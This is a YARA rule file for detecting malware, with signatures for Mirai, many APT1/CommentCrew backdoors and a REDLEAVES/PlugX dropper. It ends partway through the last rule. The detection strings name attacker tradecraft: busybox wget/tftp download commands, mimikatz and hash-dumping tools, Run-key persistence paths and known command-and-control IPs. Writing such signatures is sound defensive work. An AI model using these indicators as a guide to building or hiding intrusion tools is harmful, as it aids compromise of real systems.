import "pe"
import "hash"
import "math"
import "cuckoo"

private rule is__elf {
  meta:
    author = "@mmorenog,@yararules"
  strings:
    $header = { 7F 45 4C 46 }
  condition:
    $header at 0
}

rule is__Mirai_gen7 {
  meta:
    description = "Generic detection for MiraiX version 7"
    reference = "http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html"
    author = "unixfreaxjp"
    org = "MalwareMustDie"
    date = "2018-01-05"
  strings:
    $st01 = "/bin/busybox rm" ascii wide nocase fullword
    $st02 = "/bin/busybox echo" ascii wide nocase fullword
    $st03 = "/bin/busybox wget" ascii wide nocase fullword
    $st04 = "/bin/busybox tftp" ascii wide nocase fullword
    $st05 = "/bin/busybox cp" ascii wide nocase fullword
    $st06 = "/bin/busybox chmod" ascii wide nocase fullword
    $st07 = "/bin/busybox cat" ascii wide nocase fullword
  condition:
    5 of them
}

rule LIGHTDART_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "ret.log" ascii wide
    $s2 = "Microsoft Internet Explorer 6.0" ascii wide
    $s3 = "szURL Fail" ascii wide
    $s4 = "szURL Successfully" ascii wide
    $s5 = "%s&sdate=%04ld-%02ld-%02ld" ascii wide
  condition:
    all of them
}

rule AURIGA_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "superhard corp." ascii wide
    $s2 = "microsoft corp." ascii wide
    $s3 = "[Insert]" ascii wide
    $s4 = "[Delete]" ascii wide
    $s5 = "[End]" ascii wide
    $s6 = "!(*@)(!@KEY" ascii wide
    $s7 = "!(*@)(!@SID=" ascii wide
  condition:
    all of them
}

rule AURIGA_driver_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "Services\\riodrv32" ascii wide
    $s2 = "riodrv32.sys" ascii wide
    $s3 = "svchost.exe" ascii wide
    $s4 = "wuauserv.dll" ascii wide
    $s5 = "arp.exe" ascii wide
    $pdb = "projects\\auriga" ascii wide
  condition:
    all of ($s*) or $pdb
}

rule BANGAT_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "superhard corp." ascii wide
    $s2 = "microsoft corp." ascii wide
    $s3 = "[Insert]" ascii wide
    $s4 = "[Delete]" ascii wide
    $s5 = "[End]" ascii wide
    $s6 = "!(*@)(!@KEY" ascii wide
    $s7 = "!(*@)(!@SID=" ascii wide
    $s8 = "end      binary output" ascii wide
    $s9 = "XriteProcessMemory" ascii wide
    $s10 = "IE:Password-Protected sites" ascii wide
    $s11 = "pstorec.dll" ascii wide
  condition:
    all of them
}

rule BISCUIT_GREENCAT_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "zxdosml" ascii wide
    $s2 = "get user name error!" ascii wide
    $s3 = "get computer name error!" ascii wide
    $s4 = "----client system info----" ascii wide
    $s5 = "stfile" ascii wide
    $s6 = "cmd success!" ascii wide
  condition:
    all of them
}

rule BOUNCER_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "*Qd9kdgba33*%Wkda0Qd3kvn$*&><(*&%$E#%$#1234asdgKNAg@!gy565dtfbasdg" ascii wide
    $s2 = "IDR_DATA%d" ascii wide
    $s3 = "asdfqwe123cxz" ascii wide
    $s4 = "Mode must be 0(encrypt) or 1(decrypt)." ascii wide
  condition:
    ($s1 and $s2) or ($s3 and $s4)
}

rule BOUNCER_DLL_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "new_connection_to_bounce():" ascii wide
    $s2 = "usage:%s IP port [proxip] [port] [key]" ascii wide
  condition:
    all of them
}

rule CALENDAR_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "content" ascii wide
    $s2 = "title" ascii wide
    $s3 = "entry" ascii wide
    $s4 = "feed" ascii wide
    $s5 = "DownRun success" ascii wide
    $s6 = "%s@gmail.com" ascii wide
    $s7 = "<!--%s-->" ascii wide
    $b8 = "W4qKihsb+So=" ascii wide
    $b9 = "PoqKigY7ggH+VcnqnTcmhFCo9w==" ascii wide
    $b10 = "8oqKiqb5880/uJLzAsY=" ascii wide
  condition:
    all of ($s*) or all of ($b*)
}

rule COMBOS_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "Mozilla4.0 (compatible; MSIE 7.0; Win32)" ascii wide
    $s2 = "Mozilla5.1 (compatible; MSIE 8.0; Win32)" ascii wide
    $s3 = "Delay" ascii wide
    $s4 = "Getfile" ascii wide
    $s5 = "Putfile" ascii wide
    $s6 = "---[ Virtual Shell]---" ascii wide
    $s7 = "Not Comming From Our Server %s." ascii wide
  condition:
    all of them
}

rule DAIRY_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "Mozilla/4.0 (compatible; MSIE 7.0;)" ascii wide
    $s2 = "KilFail" ascii wide
    $s3 = "KilSucc" ascii wide
    $s4 = "pkkill" ascii wide
    $s5 = "pklist" ascii wide
  condition:
    all of them
}

rule GLOOXMAIL_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "Kill process success!" ascii wide
    $s2 = "Kill process failed!" ascii wide
    $s3 = "Sleep success!" ascii wide
    $s4 = "based on gloox" ascii wide
    $pdb = "glooxtest.pdb" ascii wide
  condition:
    all of ($s*) or $pdb
}

rule GOGGLES_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "Kill process success!" ascii wide
    $s2 = "Kill process failed!" ascii wide
    $s3 = "Sleep success!" ascii wide
    $s4 = "based on gloox" ascii wide
    $pdb = "glooxtest.pdb" ascii wide
  condition:
    all of ($s*) or $pdb
}

rule HACKSFASE1_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = { CB 39 82 49 42 BE 1F 3A }
  condition:
    all of them
}

rule HACKSFASE2_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "Send to Server failed." ascii wide
    $s2 = "HandShake with the server failed. Error:" ascii wide
    $s3 = "Decryption Failed. Context Expired." ascii wide
  condition:
    all of them
}

rule KURTON_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 5.1)" ascii wide
    $s2 = "!(*@)(!@PORT!(*@)(!@URL" ascii wide
    $s3 = "MyTmpFile.Dat" ascii wide
    $s4 = "SvcHost.DLL.log" ascii wide
  condition:
    all of them
}

rule LONGRUN_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0)" ascii wide
    $s2 = "%s\\%c%c%c%c%c%c%c" ascii wide
    $s3 = "wait:" ascii wide
    $s4 = "Dcryption Error! Invalid Character" ascii wide
  condition:
    all of them
}

rule MACROMAIL_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "svcMsn.dll" ascii wide
    $s2 = "RundllInstall" ascii wide
    $s3 = "Config service %s ok." ascii wide
    $s4 = "svchost.exe" ascii wide
  condition:
    all of them
}

rule MANITSME_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "Install an Service hosted by SVCHOST." ascii wide
    $s2 = "The Dll file that to be released." ascii wide
    $s3 = "SYSTEM\\CurrentControlSet\\Services\\" ascii wide
    $s4 = "svchost.exe" ascii wide
    $e1 = "Man,it's me" ascii wide
    $e2 = "Oh,shit" ascii wide
    $e3 = "Hallelujah" ascii wide
    $e4 = "nRet == SOCKET_ERROR" ascii wide
    $pdb1 = "rouji\\release\\Install.pdb" ascii wide
    $pdb2 = "rouji\\SvcMain.pdb" ascii wide
  condition:
    (all of ($s*)) or (all of ($e*)) or $pdb1 or $pdb2
}

rule MINIASP_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "miniasp" ascii wide
    $s2 = "wakeup=" ascii wide
    $s3 = "download ok!" ascii wide
    $s4 = "command is null!" ascii wide
    $s5 = "device_input.asp?device_t=" ascii wide
  condition:
    all of them
}

rule NEWSREELS_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)" ascii wide
    $s2 = "name=%s&userid=%04d&other=%c%s" ascii wide
    $s3 = "download ok!" ascii wide
    $s4 = "command is null!" ascii wide
    $s5 = "noclient" ascii wide
    $s6 = "wait" ascii wide
    $s7 = "active" ascii wide
    $s8 = "hello" ascii wide
  condition:
    all of them
}

rule SEASALT_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) KSMM" ascii wide
    $s2 = "upfileok" ascii wide
    $s3 = "download ok!" ascii wide
    $s4 = "upfileer" ascii wide
    $s5 = "fxftest" ascii wide
  condition:
    all of them
}

rule STARSYPOUND_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "*(SY)# cmd" ascii wide
    $s2 = "send = %d" ascii wide
    $s3 = "cmd.exe" ascii wide
    $s4 = "*(SY)#" ascii wide
  condition:
    all of them
}

rule SWORD_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "@***@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>>>" ascii wide
    $s2 = "sleep:" ascii wide
    $s3 = "down:" ascii wide
    $s4 = "*========== Bye Bye ! ==========*" ascii wide
  condition:
    all of them
}

rule thequickbrow_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "thequickbrownfxjmpsvalzydg" ascii wide
  condition:
    all of them
}

rule TABMSGSQL_APT1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "letusgohtppmmv2.0.0.1" ascii wide
    $s2 = "Mozilla/4.0 (compatible; )" ascii wide
    $s3 = "filestoc" ascii wide
    $s4 = "filectos" ascii wide
    $s5 = "reshell" ascii wide
  condition:
    all of them
}

rule CCREWBACK1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $a = "postvalue" ascii wide
    $b = "postdata" ascii wide
    $c = "postfile" ascii wide
    $d = "hostname" ascii wide
    $e = "clientkey" ascii wide
    $f = "start Cmd Failure!" ascii wide
    $g = "sleep:" ascii wide
    $h = "downloadcopy:" ascii wide
    $i = "download:" ascii wide
    $j = "geturl:" ascii wide
    $k = "1.234.1.68" ascii wide
  condition:
    4 of ($a, $b, $c, $d, $e) or $f or 3 of ($g, $h, $i, $j) or $k
}

rule TrojanCookies_CCREW {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $a = "sleep:" ascii wide
    $b = "content=" ascii wide
    $c = "reqpath=" ascii wide
    $d = "savepath=" ascii wide
    $e = "command=" ascii wide
  condition:
    4 of ($a, $b, $c, $d, $e)
}

rule GEN_CCREW1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $a = "W!r@o#n$g" ascii wide
    $b = "KerNel32.dll" ascii wide
  condition:
    any of them
}

rule Elise {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $a = "SetElise.pdb" ascii wide
  condition:
    $a
}

rule EclipseSunCloudRAT {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $a = "Eclipse_A" ascii wide
    $b = "\\PJTS\\" ascii wide
    $c = "Eclipse_Client_B.pdb" ascii wide
    $d = "XiaoME" ascii wide
    $e = "SunCloud-Code" ascii wide
    $f = "/uc_server/data/forum.asp" ascii wide
  condition:
    any of them
}

rule MoonProject {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $a = "Serverfile is smaller than Clientfile" ascii wide
    $b = "\\M tools\\" ascii wide
    $c = "MoonDLL" ascii wide
    $d = "\\M tools\\" ascii wide
  condition:
    any of them
}

rule ccrewDownloader1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $a = { DD B5 61 F0 20 47 20 57 D6 65 9C CB 31 1B 65 42 }
  condition:
    any of them
}

rule ccrewDownloader2 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $a = "3gZFQOBtY3sifNOl" ascii wide
    $b = "docbWUWsc2gRMv9HN7TFnvnKcrWUUFdAEem9DkqRALoD" ascii wide
    $c = "6QVSOZHQPCMc2A8HXdsfuNZcmUnIqWrOIjrjwOeagILnnScxadKEr1H2MZNwSnaJ" ascii wide
  condition:
    any of them
}

rule ccrewMiniasp {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $a = "MiniAsp.pdb" ascii wide
    $b = "device_t=" ascii wide
  condition:
    any of them
}

rule ccrewSSLBack2 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $a = { 39 82 49 42 BE 1F 3A }
  condition:
    any of them
}

rule ccrewSSLBack3 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $a = "SLYHKAAY" ascii wide
  condition:
    any of them
}

rule ccrewSSLBack1 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $a = "!@#%$^#@!" ascii wide
    $b = "64.91.80.6" ascii wide
  condition:
    any of them
}

rule ccrewDownloader3 {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $a = "ejlcmbv" ascii wide
    $b = "bhxjuisv" ascii wide
    $c = "yqzgrh" ascii wide
    $d = "uqusofrp" ascii wide
    $e = "Ljpltmivvdcbb" ascii wide
    $f = "frfogjviirr" ascii wide
    $g = "ximhttoskop" ascii wide
  condition:
    4 of them
}

rule ccrewQAZ {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $a = "!QAZ@WSX" ascii wide
  condition:
    $a
}

rule metaxcd {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $a = "<meta xcd=" ascii wide
  condition:
    $a
}

rule MiniASP {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $KEY = { 71 30 6E 63 39 77 38 65 64 61 6F 69 75 6B 32 6D 7A 72 66 79 33 78 74 31 70 35 6C 73 36 37 67 34 62 76 68 6A }
    $PDB = "MiniAsp.pdb" ascii wide nocase
  condition:
    any of them
}

rule DownloaderPossibleCCrew {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $a = "%s?%.6u" ascii wide
    $b = "szFileUrl=%s" ascii wide
    $c = "status=%u" ascii wide
    $d = "down file success" ascii wide
    $e = "Mozilla/4.0 (compatible; MSIE 6.0; Win32)" ascii wide
  condition:
    all of them
}

rule APT1_MAPIGET {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "%s\\Attachment.dat" ascii wide
    $s2 = "MyOutlook" ascii wide
    $s3 = "mail.txt" ascii wide
    $s4 = "Recv Time:" ascii wide
    $s5 = "Subject:" ascii wide
  condition:
    all of them
}

rule APT1_LIGHTBOLT {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $str1 = "bits.exe" ascii wide
    $str2 = "PDFBROW" ascii wide
    $str3 = "Browser.exe" ascii wide
    $str4 = "Protect!" ascii wide
  condition:
    2 of them
}

rule APT1_GETMAIL {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $stra1 = "pls give the FULL path" ascii wide
    $stra2 = "mapi32.dll" ascii wide
    $stra3 = "doCompress" ascii wide
    $strb1 = "getmail.dll" ascii wide
    $strb2 = "doCompress" ascii wide
    $strb3 = "love" ascii wide
  condition:
    all of ($stra*) or all of ($strb*)
}

rule APT1_GDOCUPLOAD {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $str1 = "name=\"GALX\"" ascii wide
    $str2 = "User-Agent: Shockwave Flash" ascii wide
    $str3 = "add cookie failed..." ascii wide
    $str4 = ",speed=%f" ascii wide
  condition:
    3 of them
}

rule APT1_WEBC2_Y21K {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $1 = "Y29ubmVjdA" ascii wide
    $2 = "c2xlZXA" ascii wide
    $3 = "cXVpdA" ascii wide
    $4 = "Y21k" ascii wide
    $5 = "dW5zdXBwb3J0" ascii wide
  condition:
    4 of them
}

rule APT1_WEBC2_YAHOO {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $http1 = "HTTP/1.0" ascii wide
    $http2 = "Content-Type:" ascii wide
    $uagent = "IPHONE8.5(host:%s,ip:%s)" ascii wide
  condition:
    all of them
}

rule APT1_WEBC2_UGX {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $persis = "SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN" ascii wide
    $exe = "DefWatch.exe" ascii wide
    $html = "index1.html" ascii wide
    $cmd1 = "!@#tiuq#@!" ascii wide
    $cmd2 = "!@#dmc#@!" ascii wide
    $cmd3 = "!@#troppusnu#@!" ascii wide
  condition:
    3 of them
}

rule APT1_WEBC2_TOCK {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $1 = "InprocServer32" ascii wide
    $2 = "HKEY_PERFORMANCE_DATA" ascii wide
    $3 = "<!---[<if IE 5>]id=" ascii wide
  condition:
    all of them
}

rule APT1_WEBC2_TABLE {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $msg1 = "Fail To Execute The Command" ascii wide
    $msg2 = "Execute The Command Successfully" ascii wide
    $gif2 = "GIF89" ascii wide
  condition:
    3 of them
}

rule APT1_WEBC2_RAVE {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $1 = "iniet.exe" ascii wide
    $2 = "cmd.exe" ascii wide
    $3 = "SYSTEM\\CurrentControlSet\\Services\\DEVFS" ascii wide
    $4 = "Device File System" ascii wide
  condition:
    3 of them
}

rule APT1_WEBC2_QBP {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $1 = "2010QBP" ascii wide
    $2 = "adobe_sl.exe" ascii wide
    $3 = "URLDownloadToCacheFile" ascii wide
    $4 = "dnsapi.dll" ascii wide
    $5 = "urlmon.dll" ascii wide
  condition:
    4 of them
}

rule APT1_WEBC2_HEAD {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $1 = "Ready!" ascii wide
    $2 = "connect ok" ascii wide
    $3 = "WinHTTP 1.0" ascii wide
    $4 = "<head>" ascii wide
  condition:
    all of them
}

rule APT1_WEBC2_GREENCAT {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $1 = "reader_sl.exe" ascii wide
    $2 = "MS80547.bat" ascii wide
    $3 = "ADR32" ascii wide
    $4 = "ControlService failed!" ascii wide
  condition:
    3 of them
}

rule APT1_WEBC2_DIV {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $1 = "3DC76854-C328-43D7-9E07-24BF894F8EF5" ascii wide
    $2 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" ascii wide
    $3 = "Hello from MFC!" ascii wide
    $4 = "Microsoft Internet Explorer" ascii wide
  condition:
    3 of them
}

rule APT1_WEBC2_CSON {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $httpa1 = "/Default.aspx?INDEX=" ascii wide
    $httpa2 = "/Default.aspx?ID=" ascii wide
    $httpb1 = "Win32" ascii wide
    $httpb2 = "Accept: text*/*" ascii wide
    $exe1 = "xcmd.exe" ascii wide
    $exe2 = "Google.exe" ascii wide
  condition:
    1 of ($exe*) and 1 of ($httpa*) and all of ($httpb*)
}

rule APT1_WEBC2_CLOVER {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $msg1 = "BUILD ERROR!" ascii wide
    $msg2 = "SUCCESS!" ascii wide
    $msg3 = "wild scan" ascii wide
    $msg4 = "Code too clever" ascii wide
    $msg5 = "insufficient lookahead" ascii wide
    $ua1 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; SV1)" ascii wide
    $ua2 = "Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.8.0.12) Firefox/1.5.0.12" ascii wide
  condition:
    2 of ($msg*) and 1 of ($ua*)
}

rule APT1_WEBC2_BOLID {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $vm = "VMProtect" ascii wide
    $http = "http://[c2_location]/[page].html" ascii wide
  condition:
    all of them
}

rule APT1_WEBC2_ADSPACE {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $1 = "<!---HEADER ADSPACE style=" ascii wide
    $2 = "ERSVC.DLL" ascii wide
  condition:
    all of them
}

rule APT1_WEBC2_AUSOV {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $1 = "ntshrui.dll" ascii wide
    $2 = "%SystemRoot%\\System32\\" ascii wide
    $3 = "<!--DOCHTML" ascii wide
    $4 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" ascii wide
    $5 = "Ausov" ascii wide
  condition:
    4 of them
}

rule APT1_WARP {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $err1 = "exception..." ascii wide
    $err2 = "failed..." ascii wide
    $err3 = "opened..." ascii wide
    $exe1 = "cmd.exe" ascii wide
    $exe2 = "ISUN32.EXE" ascii wide
  condition:
    2 of ($err*) and all of ($exe*)
}

rule APT1_TARSIP_ECLIPSE {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $1 = "\\pipe\\ssnp" ascii wide
    $2 = "toobu.ini" ascii wide
    $3 = "Serverfile is not bigger than Clientfile" ascii wide
    $4 = "URL download success" ascii wide
  condition:
    3 of them
}

rule APT1_TARSIP_MOON {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $s1 = "\\XiaoME\\SunCloud-Code\\moon" ascii wide
    $s2 = "URL download success!" ascii wide
    $s3 = "Kugoosoft" ascii wide
    $msg1 = "Modify file failed!! So strange!" ascii wide
    $msg2 = "Create cmd process failed!" ascii wide
    $msg3 = "The command has not been implemented!" ascii wide
    $msg4 = "Runas success!" ascii wide
    $onec1 = "onec.php" ascii wide
    $onec2 = "/bin/onec" ascii wide
  condition:
    1 of ($s*) and 1 of ($msg*) and 1 of ($onec*)
}

rule APT1_RARSilent_EXE_PDF {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $winrar1 = "WINRAR.SFX" ascii wide
    $str2 = "Steup=" ascii wide
  condition:
    all of them
}

rule APT1_aspnetreport {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $url = "aspnet_client/report.asp" ascii wide
    $param = "name=%s&Gender=%c&Random=%04d&SessionKey=%s" ascii wide
    $pay1 = "rusinfo.exe" ascii wide
    $pay2 = "cmd.exe" ascii wide
    $pay3 = "AdobeUpdater.exe" ascii wide
    $pay4 = "buildout.exe" ascii wide
    $pay5 = "DefWatch.exe" ascii wide
    $pay6 = "d.exe" ascii wide
    $pay7 = "em.exe" ascii wide
    $pay8 = "IMSCMig.exe" ascii wide
    $pay9 = "localfile.exe" ascii wide
    $pay10 = "md.exe" ascii wide
    $pay11 = "mdm.exe" ascii wide
    $pay12 = "mimikatz.exe" ascii wide
    $pay13 = "msdev.exe" ascii wide
    $pay14 = "ntoskrnl.exe" ascii wide
    $pay15 = "p.exe" ascii wide
    $pay16 = "otepad.exe" ascii wide
    $pay17 = "reg.exe" ascii wide
    $pay18 = "regsvr.exe" ascii wide
    $pay19 = "runinfo.exe" ascii wide
    $pay20 = "AdobeUpdate.exe" ascii wide
    $pay21 = "inetinfo.exe" ascii wide
    $pay22 = "svehost.exe" ascii wide
    $pay23 = "update.exe" ascii wide
    $pay24 = "NTLMHash.exe" ascii wide
    $pay25 = "wpnpinst.exe" ascii wide
    $pay26 = "WSDbg.exe" ascii wide
    $pay27 = "xcmd.exe" ascii wide
    $pay28 = "adobeup.exe" ascii wide
    $pay29 = "0830.bin" ascii wide
    $pay30 = "1001.bin" ascii wide
    $pay31 = "a.bin" ascii wide
    $pay32 = "ISUN32.EXE" ascii wide
    $pay33 = "AcroRD32.EXE" ascii wide
    $pay34 = "INETINFO.EXE" ascii wide
  condition:
    $url and $param and 1 of ($pay*)
}

rule APT1_Revird_svc {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $dll1 = "nwwwks.dll" ascii wide
    $dll2 = "rdisk.dll" ascii wide
    $dll3 = "skeys.dll" ascii wide
    $dll4 = "SvcHost.DLL.log" ascii wide
    $svc1 = "InstallService" ascii wide
    $svc2 = "RundllInstallA" ascii wide
    $svc3 = "RundllUninstallA" ascii wide
    $svc4 = "ServiceMain" ascii wide
    $svc5 = "UninstallService" ascii wide
  condition:
    1 of ($dll*) and 2 of ($svc*)
}

rule APT1_dbg_mess {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $dbg1 = "Down file ok!" ascii wide
    $dbg2 = "Send file ok!" ascii wide
    $dbg3 = "Command Error!" ascii wide
    $dbg4 = "Pls choose target first!" ascii wide
    $dbg5 = "Alert!" ascii wide
    $dbg6 = "Pls press enter to make sure!" ascii wide
    $dbg7 = "Are you sure to " ascii wide
    $pay1 = "rusinfo.exe" ascii wide
    $pay2 = "cmd.exe" ascii wide
    $pay3 = "AdobeUpdater.exe" ascii wide
    $pay4 = "buildout.exe" ascii wide
    $pay5 = "DefWatch.exe" ascii wide
    $pay6 = "d.exe" ascii wide
    $pay7 = "em.exe" ascii wide
    $pay8 = "IMSCMig.exe" ascii wide
    $pay9 = "localfile.exe" ascii wide
    $pay10 = "md.exe" ascii wide
    $pay11 = "mdm.exe" ascii wide
    $pay12 = "mimikatz.exe" ascii wide
    $pay13 = "msdev.exe" ascii wide
    $pay14 = "ntoskrnl.exe" ascii wide
    $pay15 = "p.exe" ascii wide
    $pay16 = "otepad.exe" ascii wide
    $pay17 = "reg.exe" ascii wide
    $pay18 = "regsvr.exe" ascii wide
    $pay19 = "runinfo.exe" ascii wide
    $pay20 = "AdobeUpdate.exe" ascii wide
    $pay21 = "inetinfo.exe" ascii wide
    $pay22 = "svehost.exe" ascii wide
    $pay23 = "update.exe" ascii wide
    $pay24 = "NTLMHash.exe" ascii wide
    $pay25 = "wpnpinst.exe" ascii wide
    $pay26 = "WSDbg.exe" ascii wide
    $pay27 = "xcmd.exe" ascii wide
    $pay28 = "adobeup.exe" ascii wide
    $pay29 = "0830.bin" ascii wide
    $pay30 = "1001.bin" ascii wide
    $pay31 = "a.bin" ascii wide
    $pay32 = "ISUN32.EXE" ascii wide
    $pay33 = "AcroRD32.EXE" ascii wide
    $pay34 = "INETINFO.EXE" ascii wide
  condition:
    4 of ($dbg*) and 1 of ($pay*)
}

rule APT1_known_malicious_RARSilent {
  meta:
    author = "AlienVault Labs"
    info = "CommentCrew-threat-apt1"
  strings:
    $str1 = "Analysis And Outlook.doc" ascii wide
    $str2 = "North Korean launch.pdf" ascii wide
    $str3 = "Dollar General.doc" ascii wide
    $str4 = "Dow Corning Corp.pdf" ascii wide
  condition:
    1 of them and APT1_RARSilent_EXE_PDF
}

rule Dropper_DeploysMalwareViaSideLoading {
  meta:
    description = "Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX"
    author = "USG"
    true_positive = "5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx. "
    reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
  strings:
    $UniqueString = { 2E 6C 6E 6B [0-14] 61 76 70 75 69 2E 65 78 65 }
    $PsuedoRandomStringGenerator = { B9 1A [0-6] F7 F9 46 80 C2 41 88 54 35 8B 83 FE 64 }
  condition:
    any of them
}

rule REDLEAVES_DroppedFile_ImplantLoader_Starburn {
  meta:
    description = "Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT"
    author = "USG"
    true_positive = "7f8a867a8302fe58039a6db254d335ae"
    reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
  strings:
